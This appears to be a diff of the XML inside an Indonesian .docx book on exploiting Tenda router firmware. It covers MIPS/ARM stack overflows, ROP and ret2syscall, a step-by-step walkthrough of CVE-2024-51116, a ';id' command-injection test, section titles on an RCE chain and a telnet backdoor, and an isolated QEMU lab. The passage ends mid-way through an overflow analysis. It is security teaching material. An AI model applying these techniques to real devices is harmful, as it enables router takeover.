-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> untuk menghemat ukuran/kompatibilitas. Jadi stack overflow tetap mematikan di IoT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>14. Eksploitasi MIPS: seluk-beluk</w:t>
@@ -13183,41 +13267,41 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>14.1 Dari crash ke kontrol</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Kirim payload 'A'*N, catat di nilai berapa register/PC berubah (via gdb/qemu) = cari OFFSET dengan pola siklik.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ganti 4 byte terakhir dengan alamat uji (mis. 0x41414141) -&gt; pastikan PC menjadi 0x41414141.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Arahkan ke fungsi menarik: `system("/bin/sh")`, atau ROP chain, atau shellcode.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>14.1 Dari crash ke kontrol</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Kirim payload 'A'*N, catat di nilai berapa register/PC berubah (via gdb/qemu) = cari OFFSET dengan pola siklik.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ganti 4 byte terakhir dengan alamat uji (mis. 0x41414141) -&gt; pastikan PC menjadi 0x41414141.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Arahkan ke fungsi menarik: `system("/bin/sh")`, atau ROP chain, atau shellcode.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
         <w:t>15. Eksploitasi ARM: seluk-beluk</w:t>
       </w:r>
     </w:p>
@@ -13255,7 +13339,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>16. Mitigasi Modern &amp; Kenyataan di Embedded</w:t>
@@ -13625,7 +13709,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>17. Teknik Kontrol Eksekusi</w:t>
@@ -13633,7 +13717,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>17.1 Shellcode di stack (jika NX off)</w:t>
@@ -13649,7 +13733,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>17.2 ret2libc</w:t>
@@ -13665,7 +13749,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>17.3 ROP (Return-Oriented Programming)</w:t>
@@ -13697,23 +13781,23 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>17.4 ret2syscall</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Jika fungsi libc tidak cocok, siapkan register sesuai ABI syscall MIPS/ARM lalu `syscall` untuk execve. Perlu gadget pengatur register.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>17.4 ret2syscall</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>Jika fungsi libc tidak cocok, siapkan register sesuai ABI syscall MIPS/ARM lalu `syscall` untuk execve. Perlu gadget pengatur register.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>18. Menulis Exploit dengan pwntools</w:t>
@@ -13783,39 +13867,39 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>18.1 Bad characters &amp; encoding HTTP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Byte NUL (0x00) sering memotong string di parser C.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Karakter khusus URL harus di-encode (`%00`, `%0a`, dll) — tetapi encoding bisa mengubah makna payload.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Kadang perlu menghindari '&amp;', '=', spasi di body form.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>18.1 Bad characters &amp; encoding HTTP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Byte NUL (0x00) sering memotong string di parser C.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Karakter khusus URL harus di-encode (`%00`, `%0a`, dll) — tetapi encoding bisa mengubah makna payload.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Kadang perlu menghindari '&amp;', '=', spasi di body form.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>19. Emulasi &amp; Debug Exploit</w:t>
@@ -13863,10 +13947,95 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>20. Studi Kasus: CVE Tenda</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Mari rangkai seluruh alur pada fungsi nyata yang dipakai CVE:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Buka httpd di Ghidra; cari string `formSetPPTPServer` (CVE-2024-51116).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ikuti XREF ke fungsi handler; lihat pseudo-C: cari penyalinan parameter ke buffer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Tentukan ukuran buffer; dari asm, hitung jarak ke `sw $ra`/`lw $ra`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Kirim string panjang ke endpoint terkait (via sesi yang sudah login) -&gt; amati crash.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Naikkan ke kontrol PC: cari alamat `system`/gadget; susun payload; uji di emulasi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Keluarga CVE lain (`setaccount` /cloudv2, `SetSpeedWan`, `fast_setting_wifi_set`, `addressNat`) mengikuti pola sama: parameter → buffer → tanpa cek → boom.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>20. Studi Kasus: CVE Tenda</w:t>
+        <w:t>BAGIAN D — PRAKTIK &amp; PENUTUP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>21. Lab Bertahap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>21.1 Dapatkan rootfs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13874,97 +14043,12 @@
         <w:rPr>
           <w:b w:val="0"/>
         </w:rPr>
-        <w:t>Mari rangkai seluruh alur pada fungsi nyata yang dipakai CVE:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Buka httpd di Ghidra; cari string `formSetPPTPServer` (CVE-2024-51116).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ikuti XREF ke fungsi handler; lihat pseudo-C: cari penyalinan parameter ke buffer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Tentukan ukuran buffer; dari asm, hitung jarak ke `sw $ra`/`lw $ra`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Kirim string panjang ke endpoint terkait (via sesi yang sudah login) -&gt; amati crash.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Naikkan ke kontrol PC: cari alamat `system`/gadget; susun payload; uji di emulasi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>Keluarga CVE lain (`setaccount` /cloudv2, `SetSpeedWan`, `fast_setting_wifi_set`, `addressNat`) mengikuti pola sama: parameter → buffer → tanpa cek → boom.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN D — PRAKTIK &amp; PENUTUP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>21. Lab Bertahap</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>21.1 Dapatkan rootfs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
         <w:t>Lihat Volume 1 Bab 15 &amp; Bab 22 di buku ini untuk ekstraksi. Jika httpd standar, `unsquashfs` cukup; jika kustom (seperti firmware ini), lihat Bab 22.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>21.2 Siapkan emulasi</w:t>
@@ -13986,60 +14070,87 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>21.3 Mulai dari yang mudah</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Jalankan `httpd` di qemu; pastikan bisa diakses HTTP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ulangi auth bypass (Volume 1) di emulasi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cari fungsi ping/diagnostik; uji command injection dengan payload jinak (`;id`).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Baru masuk buffer overflow: cari offset, kendalikan PC, arahkan ke `system`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>21.3 Mulai dari yang mudah</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Jalankan `httpd` di qemu; pastikan bisa diakses HTTP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ulangi auth bypass (Volume 1) di emulasi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Cari fungsi ping/diagnostik; uji command injection dengan payload jinak (`;id`).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Baru masuk buffer overflow: cari offset, kendalikan PC, arahkan ke `system`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
         <w:t>22. Catatan Nyata: Membongkar SquashFS Kustom Tenda</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Catatan pembaruan: awalnya rootfs SquashFS Tenda sempat gagal diekstrak tool umum (blok ber-marker 'Tenda'). Namun setelah partisi rootfs diekstrak dengan benar, kita BERHASIL memperoleh bin/httpd ASLI (lihat firmware/httpd di repo). Seluruh analisis di buku ini dilakukan pada biner nyata.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ini pelajaran RE yang </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>sangat berharga</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: firmware AC6 v2 Realtek milik Anda </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>tidak bisa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> diekstrak dengan `unsquashfs` biasa (gagal `xz` / `LZMA_FORMAT_ERROR`).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>22.1 Hasi binwalk</w:t>
@@ -14061,7 +14172,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>22.2 Supeblock jujur, data tidak standar</w:t>
@@ -14096,66 +14207,66 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>22.3 Pelajaran</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vendor sering **memodifikasi format** untuk menghambat analisis / branding.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Tool umum (unsquashfs, 7z, sasquatch standar) bisa gagal → pahami formatnya, atau pakai/program tool khusus.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ini justru latihan RE tingkat lanjut: membandingkan blok, menebak header, mencoba beberapa decompressor (LZMA/LZMA2/raw).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Kernel dan struktur firmware tetap bisa dianalisis (kita berhasil meng-disassembly MIPS asli).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Langkah lanjutan yang benar:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cari tool ekstraksi khusus Tenda/Realtek, atau tulis extractor sendiri setelah memahami header kustom (bandingkan blok satu-per-satu). Inilah keterampilan RE sejati: tidak berhenti saat tool gagal.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>22.3 Pelajaran</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Vendor sering **memodifikasi format** untuk menghambat analisis / branding.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Tool umum (unsquashfs, 7z, sasquatch standar) bisa gagal → pahami formatnya, atau pakai/program tool khusus.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ini justru latihan RE tingkat lanjut: membandingkan blok, menebak header, mencoba beberapa decompressor (LZMA/LZMA2/raw).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Kernel dan struktur firmware tetap bisa dianalisis (kita berhasil meng-disassembly MIPS asli).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Langkah lanjutan yang benar:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cari tool ekstraksi khusus Tenda/Realtek, atau tulis extractor sendiri setelah memahami header kustom (bandingkan blok satu-per-satu). Inilah keterampilan RE sejati: tidak berhenti saat tool gagal.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>23. Cheat Sheet RE &amp; Exploitasi</w:t>
@@ -14514,7 +14625,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>24. Glosarium &amp; Referensi</w:t>
@@ -14817,7 +14928,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>Referensi belajar</w:t>
@@ -14878,7 +14989,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -14888,7 +14998,7 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="44"/>
         </w:rPr>
         <w:t>BAGIAN IV</w:t>
       </w:r>
@@ -14902,17 +15012,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
+          <w:sz w:val="52"/>
         </w:rPr>
         <w:t>RCE &amp; Privilege Escalation</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>RCE &amp; Privilege Escalation</w:t>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -14949,7 +15056,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>1. Ringkasan</w:t>
@@ -15246,7 +15353,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>2. RCE #1 — Command Injection</w:t>
@@ -15477,7 +15584,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>3. RCE #2 — Buffer Overflow</w:t>
@@ -15807,7 +15914,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>4. RCE #3 — Backdoor /goform/telnet</w:t>
@@ -15859,7 +15966,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>5. Privilege Escalation / Root</w:t>
@@ -15919,7 +16026,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>6. Rantai Serangan End-to-End</w:t>
@@ -15971,7 +16078,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>7. Rekomendasi (Mitigasi)</w:t>
@@ -16023,7 +16130,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -16033,7 +16139,7 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="44"/>
         </w:rPr>
         <w:t>BAGIAN V</w:t>
       </w:r>
@@ -16047,17 +16153,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
-        </w:rPr>
-        <w:t>Temuan Lanjutan (Backdoor, Privesc, Root Shell, Telemetri)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lampiran 3 — Temuan Lanjutan: Backdoor, Privilege Escalation &amp; Root Shell</w:t>
+          <w:sz w:val="52"/>
+        </w:rPr>
+        <w:t>Emulasi Terisolasi &amp; Uji Overflow Aman</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -16067,12 +16170,1625 @@
           <w:color w:val="555555"/>
           <w:sz w:val="20"/>
         </w:rPr>
+        <w:t>Seluruh pengujian pada bagian ini dilakukan di emulator QEMU/FirmAE yang terisolasi total dari LAN (user-net + hostfwd + blokir egress), TANPA menyentuh hardware. Data pribadi diredaksi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>1. Arsitektur Isolasi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>QEMU `user-net` (SLIRP) + `hostfwd tcp::8080-:80` (guest 10.0.2.15). Guest httpd bind 10.0.2.15:80 (config `lan.ip` diubah).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Container: `iptables -A OUTPUT -d 192.168.0.0/24 -o eth0 -j DROP` + rute via tap/hostfwd saja. Akses uji via `http://127.0.0.1:8080/` (hostfwd).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Pelajaran penting: FirmAE `run.sh -r` TIDAK rebuild `image.raw`; hapus `scratch/&lt;iid&gt;` tiap ubah tar. Jangan percaya `192.168.0.1` dari container tanpa verifikasi rute (pernah menembus ke router asli via NAT).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>2. CFM (Config Management) — Hasil Bedah</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Daemon `cfmd`/`libCfm` memakai socket AF_UNIX ke `/var/cfm_socket` dengan pesan struct tetap 2016 byte (`op@0`, `key@4`, `value@0x204`), dibalas `op+1` (dari RE `cfmd::handle_socket`/`SendMsg`).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Client libCfm (`ConnectServer`): `socket(AF_UNIX,SOCK_DGRAM)` → `connect(...,110)`. Server asli (`InitServer`) juga DGRAM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Namun `strace` menunjukkan `httpd` juga melakukan `socket(AF_UNIX,SOCK_STREAM)` + `connect(...,110)` ke path yang sama → indikasi dual-client (DGRAM + STREAM). Satu path tak bisa layani keduanya sekaligus.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>`cfm_stub` (MIPS, ditulis dari nol: DGRAM &amp; STREAM, protokol 2016-byte, varian embed MIB 89KB + lookup key→value) terbukti bind &amp; melayani (`/proc/net/unix`, `cfmc`='C' lintas-proses). `LD_PRELOAD` tidak berlaku (loader uClibc).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>3. Overflow — Konfirmasi Dinamis (gdb via QEMU gdbstub)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Target: `POST /goform/fast_setting_wifi_set`, param `ssid` → `form_fast_setting_wifi_set @0x477c20`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>websGetVar(req,"ssid",...) -&gt; jika kosong redirect login.html</w:t>
+        <w:br/>
+        <w:t>strcpy(fp+0x50, ssid)   ; 0x477db0 (64 byte)</w:t>
+        <w:br/>
+        <w:t>strcpy(fp+0x90, ssid)   ; 0x477dd4 (64 byte, write terakhir)</w:t>
